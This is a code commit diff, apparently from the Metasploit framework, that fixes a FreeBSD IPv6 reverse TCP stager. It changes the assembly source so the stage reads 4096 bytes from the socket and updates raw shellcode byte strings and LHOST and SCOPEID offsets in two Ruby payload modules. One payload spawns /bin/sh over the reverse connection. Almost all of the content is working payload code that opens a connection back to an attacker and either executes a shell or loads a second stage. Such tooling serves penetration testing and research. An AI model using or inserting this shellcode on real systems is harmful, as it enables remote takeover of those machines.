Fix up reverse_tcp ipv6 stager for freebsd
parent
29d8feaa24
commit
0c2a18d765
|
@ -76,10 +76,10 @@ ipv6_address:
|
|||
db 28 ; sa_family_t sin6_family; /* AF_INET6 */
|
||||
dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
|
||||
dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
|
||||
dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */
|
||||
dd 0x48474645
|
||||
dd 0x4d4b4a49
|
||||
dd 0x51504f4e
|
||||
dd 0 ; struct in6_addr sin6_addr; /* IP6 address */
|
||||
dd 0
|
||||
dd 0
|
||||
dd 0x01000000 ; default to ::1
|
||||
dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
|
||||
|
||||
skip_bounce:
|
||||
|
@ -87,9 +87,26 @@ skip_bounce:
|
|||
%ifndef USE_SINGLE_STAGE
|
||||
|
||||
read:
|
||||
push byte 0x10
|
||||
pop edx
|
||||
shl edx, 8
|
||||
sub esp, edx
|
||||
mov ecx, esp ; Points to 4096 stack buffer
|
||||
|
||||
push edx ; Length
|
||||
push ecx ; Buffer
|
||||
|
||||
%ifdef FD_REG_EBX
|
||||
push ebx ; Socket
|
||||
%else
|
||||
push edi ; Socket
|
||||
%endif
|
||||
|
||||
push ecx ; Buffer to Return
|
||||
|
||||
mov al, 0x3
|
||||
mov byte [ecx - 0x3], 0x10
|
||||
int 0x80
|
||||
ret
|
||||
int 0x80 ; read(socket, &buff, 4096)
|
||||
|
||||
ret ; Return
|
||||
|
||||
%endif
|
||||
|
|
|
@ -35,18 +35,17 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 43, 'ADDR6' ],
|
||||
'LHOST' => [ 42, 'ADDR6' ],
|
||||
'LPORT' => [ 36, 'n' ],
|
||||
'SCOPEID' => [ 59, 'V' ]
|
||||
'SCOPEID' => [ 58, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
|
||||
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
|
||||
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
|
||||
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" +
|
||||
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" +
|
||||
"\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" +
|
||||
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"
|
||||
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
|
|
|
@ -45,16 +45,18 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 43, 'ADDR6' ],
|
||||
'LHOST' => [ 42, 'ADDR6' ],
|
||||
'LPORT' => [ 36, 'n' ],
|
||||
'SCOPEID' => [ 59, 'V' ]
|
||||
'SCOPEID' => [ 58, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
|
||||
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
|
||||
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
|
||||
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" +
|
||||
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" +
|
||||
"\xc6\x41\xfd\x10\xcd\x80\xc3"
|
||||
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" +
|
||||
"\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" +
|
||||
"\xc3"
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
|
|
Loading…
Reference in New Issue